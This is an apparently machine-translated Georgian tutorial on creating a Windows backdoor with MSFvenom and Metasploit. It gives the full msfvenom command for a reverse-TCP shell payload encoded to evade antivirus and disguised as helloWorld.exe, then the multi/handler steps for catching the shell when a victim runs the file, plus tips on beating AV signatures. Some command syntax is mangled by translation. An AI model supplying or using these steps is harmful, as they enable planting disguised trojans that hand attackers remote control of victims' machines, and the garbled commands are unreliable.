უკანა კარი გამოიყენება უსაფრთხოების მექანიზმების გვერდის ავლით, ხშირად ფარულად და უმეტესად დაუდგენლად. MSFvenom– ის გამოყენებით, msfpayload და msfencode, შესაძლებელია შეიქმნას უკანა კარი, რომელიც თავდამსხმელს უკავშირდება საპირისპირო გარსის TCP გამოყენებით. კარის შემუშავების მიზნით, თქვენ უნდა შეცვალოთ თქვენი მავნე პროგრამის ხელმოწერა, რათა თავიდან აიცილოთ ნებისმიერი ანტივირუსული პროგრამა. დაასრულეთ ეს პროექტი იმ წყვილ კომპიუტერზე, რომლებზედაც გაქვთ წვდომის ნებართვა, და ამ პროცესში თქვენ შეიტყობთ უფრო მეტს კომპიუტერის უსაფრთხოების შესახებ და როგორ მუშაობს ამ სახის უკანა კარი.
ნაბიჯები
ნაბიჯი 1. გაუშვით კალი და გაუშვით ტერმინალის კონსოლი
ნაბიჯი 2. ჩაწერეთ ifconfig, რომ ნახოთ ინტერფეისი და შეამოწმოთ თქვენი IP მისამართი
ნაბიჯი 3. აკრიფეთ msfvenom -l კოდირებით, რომ ნახოთ კოდირების სია
თქვენ გამოიყენებთ x86/shikata_ga_nai როგორც კოდირებას
ნაბიჯი 4. ჩაწერეთ "msfvenom -a x86 -პლატფორმის ფანჯრები -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86/shikata_ga_nai -f exe> helloWorld.exe
- -a x86 -პლატფორმის ფანჯრები ნიშნავს არქიტექტურის გამოყენებას.
- -p windows/shell/reverse_tcp ნიშნავს დატვირთვას ჩასაყენებლად.
- LHOST ნიშნავს მსმენელის IP მისამართს.
- LPORT ნიშნავს მსმენელის პორტს.
- -b "\ x00" ნიშნავს ცუდი სიმბოლოების თავიდან აცილებას (null ბაიტი).
- -e x86/shikata_ga_nai ნიშნავს კოდირების სახელს.
- -f exe> helloWorld.exe ნიშნავს ფორმატის გამომავალს.
ნაბიჯი 5. აკრიფეთ msfconsole Metasploit- ის გასააქტიურებლად
ახლა თქვენ შექმენით თქვენი უკანა კარი. როდესაც მსხვერპლი დააჭერს helloWorld.exe- ს, ჩამონტაჟებული გარსის დატვირთვა გააქტიურდება და დააბრუნებს თქვენს სისტემას. იმისათვის, რომ მიიღოთ კავშირი, თქვენ უნდა გახსნათ მრავალმხრივი დამუშავება Metasploit– ში და დააყენოთ დატვირთვები
ნაბიჯი 6. ჩაწერეთ use exploit/multi/handler
ნაბიჯი 7. ჩაწერეთ მითითებული დატვირთვა windows/shell/reverse_tcp
ნაბიჯი 8. ჩაწერეთ ჩვენების პარამეტრები მოდულის შესამოწმებლად
ნაბიჯი 9. აკრიფეთ LHOST 192.168.48.129
"LHOST" ნიშნავს მსმენელის IP მისამართს
ნაბიჯი 10. ჩაწერეთ LPORT 4444
"LPORT" ნიშნავს მსმენელის პორტს
ნაბიჯი 11. ჩაწერეთ გაშვება და დაელოდეთ კავშირი მსხვერპლის აპარატიდან
ნაბიჯი 12. დაელოდეთ მსხვერპლს დააწკაპუნეთ helloWorld.exe
შემდეგ თქვენ წარმატებით იქნებით დაკავშირებული მსხვერპლის აპარატთან.
Რჩევები
- -I MSFvenom– ში გამოყენება წარმოადგენს კოდირების გამეორებებს. ზოგჯერ უფრო მეტმა გამეორებამ შეიძლება ხელი შეუწყოს AV პროგრამული უზრუნველყოფის თავიდან აცილებას.
- თქვენ ისწავლეთ როგორ შექმნათ backdoor და კოდირებული MSFvenom– ის გამოყენებით, მაგრამ ეს მეთოდი სრულყოფილად არ გამოდგება დღევანდელ დღეს AV პროგრამული უზრუნველყოფის ზოგიერთი პროგრამის წინააღმდეგ. ამის მიზეზი არის MSFvenom– ში შესრულების შაბლონები. AV გამყიდველებმა დაამატეს ამ შაბლონების სტატიკური ხელმოწერა და უბრალოდ მოძებნეთ ისინი. ამ საკითხის გადაწყვეტაა სხვადასხვა აღსრულების შაბლონის ან სხვადასხვა ინსტრუმენტების გამოყენება.